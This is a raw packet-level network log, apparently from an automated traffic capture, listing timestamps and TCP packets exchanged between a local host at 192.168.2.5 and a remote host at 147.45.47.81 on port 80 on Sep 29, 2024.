                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.312855005 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.312969923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313011885 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313218117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313325882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313374043 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313575983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313659906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313705921 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313709021 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313756943 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313803911 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.313805103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314481020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314527035 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314560890 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314640045 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314683914 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314687967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314735889 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.314786911 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.315428972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.315493107 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.315540075 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.317745924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.317863941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.317922115 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.317943096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.317991972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318039894 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318274021 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318397999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318444967 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318635941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318701029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318744898 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.318949938 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319013119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319051981 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319582939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319647074 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319693089 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319736004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319813967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.319855928 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320095062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320157051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320209026 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320507050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320564985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320611000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320620060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320667982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.320713043 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.322779894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.322879076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.322923899 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.322926044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.322989941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323035955 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323050976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323106050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323148012 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323151112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323198080 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323242903 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323359013 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323462009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323502064 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323507071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323575020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323621035 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323745966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323864937 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323908091 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323928118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.323976040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324019909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324162006 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324227095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324270010 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324274063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324321032 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324367046 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324568987 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324631929 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324666023 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324676991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324727058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324770927 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.324944019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325017929 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325061083 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325066090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325113058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325159073 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325333118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325417042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325459003 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325463057 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325510979 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325552940 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325726986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325803041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325843096 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325849056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325898886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.325948000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.326136112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.326201916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.326246977 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.326250076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.326297998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.326371908 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328078985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328142881 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328186989 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328190088 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328241110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328289032 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328306913 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328372002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328418016 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328421116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328468084 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328512907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328543901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328620911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328660011 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328665972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328715086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328761101 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328921080 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.328984976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329025030 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329030991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329078913 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329123020 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329183102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329277039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329319000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329324007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329371929 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329416990 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329524040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329586983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329628944 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329632044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329679012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329722881 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329843044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329905987 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329951048 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329952955 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.329999924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330045938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330077887 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330141068 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330183983 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330187082 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330235004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330280066 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330348015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330411911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330461025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330462933 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330537081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330579996 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330583096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330630064 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330672026 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330676079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330724955 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330769062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330856085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330903053 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330944061 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330950022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.330997944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331042051 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331044912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331106901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331150055 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331167936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331214905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331254959 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331259966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331322908 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331367016 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331368923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331451893 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331494093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331511974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331558943 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331600904 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331604004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331650972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331691980 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331698895 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331748962 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331792116 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331794024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331841946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331882000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331887960 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331937075 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331980944 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.331984043 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332051992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332091093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332099915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332161903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332206011 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332207918 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332254887 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332298040 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332304001 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332367897 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332410097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332413912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332461119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332501888 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332509041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332571983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332613945 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332617998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332664967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332712889 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332715034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332762957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332804918 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332808971 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332890034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.332935095 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333617926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333673000 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333698988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333723068 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333800077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333815098 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333838940 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333843946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333865881 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333884001 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333956003 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333971977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333997965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.333998919 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334016085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334038019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334042072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334063053 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334080935 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334084988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334122896 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334178925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334199905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334237099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334296942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334311008 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334341049 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334342957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334362030 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334383965 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334402084 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334403038 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.334428072 CEST8049706147.45.47.81192.168.2.5
